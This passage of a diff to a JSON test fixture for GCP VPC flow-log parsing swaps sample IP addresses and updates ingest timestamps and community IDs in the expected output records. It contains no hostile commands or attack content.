"1:NAY9D1IuyJAG+Hm34t3LIlP6/4c=", "bytes": 15169, "name": "default", "transport": "tcp", @@ -653,7 +653,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -689,8 +689,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868408500Z", - "original": "{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391191600Z", + "original": "{\"insertId\":\"ut8lbrffooxyp\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"92\",\"reporter\":\"SRC\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", "end": "2019-06-14T03:49:51.821308944Z", @@ -717,18 +717,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 250864, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 247 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:9htI9XhB+GFEM8rmtAiskiLz++Y=", + "community_id": "1:inP0peZrjQuMumAL2dZH5u0O354=", "bytes": 250864, "name": "default", "transport": "tcp", @@ -750,7 +750,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -787,8 +787,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868411600Z", - "original": "{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391196Z", + "original": "{\"insertId\":\"ut8lbrffooxzd\",\"jsonPayload\":{\"bytes_sent\":\"250864\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -815,18 +815,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 167939, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 63 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ee5EHtJfWgzMQEQZSyTFAwZbgus=", + "community_id": "1:NAY9D1IuyJAG+Hm34t3LIlP6/4c=", "bytes": 167939, "name": "default", "transport": "tcp", @@ -848,7 +848,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -885,8 +885,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868415800Z", - "original": "{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391200100Z", + "original": "{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", "end": "2019-06-14T03:49:51.821308944Z", @@ -915,17 +915,17 @@ "as": { "number": 49505 }, - "address": "192.0.2.23", + "address": "192.168.2.23", "port": 59679, "bytes": 0, - "ip": "192.0.2.23", + "ip": "192.168.2.23", "packets": 3 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:E803d6gSw9j7F6zoCo0Ka6fb9Iw=", + "community_id": "1:MRmF95Hv0PHOjUO7gqbVt98osmo=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -939,7 +939,7 @@ }, "related": { "ip": [ - "192.0.2.23", + "192.168.2.23", "10.139.99.242" ] }, @@ -961,8 +961,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868419800Z", - "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391203800Z", + "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:45.860349247Z", "end": "2019-06-14T03:40:46.031032701Z", @@ -989,18 +989,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33576, "bytes": 11773, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 94 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:06oSJgliwJ21tZTkobvsHx/M+Pc=", + "community_id": "1:FYaJFSEAKLcBCMFoT6sR5TMHf/s=", "bytes": 11773, "name": "default", "transport": "tcp", @@ -1022,7 +1022,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -1059,8 +1059,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868423800Z", - "original": "{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391207800Z", + "original": "{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -1087,18 +1087,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33562, "bytes": 65699, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:oDThWwe999DZ+ToL+uXcjZRio7c=", + "community_id": "1:zUvAQSLCTNOIkUn3aNG0HbYxPv8=", "bytes": 65699, "name": "default", "transport": "tcp", @@ -1120,7 +1120,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -1157,8 +1157,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868427900Z", - "original": "{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391211200Z", + "original": "{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", "end": "2019-06-14T03:49:56.393910944Z", @@ -1179,10 +1179,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1196,7 +1196,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:yZywQ4jpdohOQ9684uKWIPHHP4Y=", + "community_id": "1:pWEbJIgG8triE8M05SRo2qQc0c8=", "bytes": 66029, "name": "default", "transport": "tcp", @@ -1219,7 +1219,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -1255,8 +1255,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868431400Z", - "original": "{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391215700Z", + "original": "{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -1277,10 +1277,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1294,7 +1294,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:orgrC+fuNweNF7YN8VWuWIAnY80=", + "community_id": "1:6IVVaT8jMDNLIBHaC8OISRVYWS4=", "bytes": 65154, "name": "default", "transport": "tcp", @@ -1317,7 +1317,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -1353,8 +1353,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868434700Z", - "original": "{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391221400Z", + "original": "{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", "end": "2019-06-14T03:49:59.565272745Z", @@ 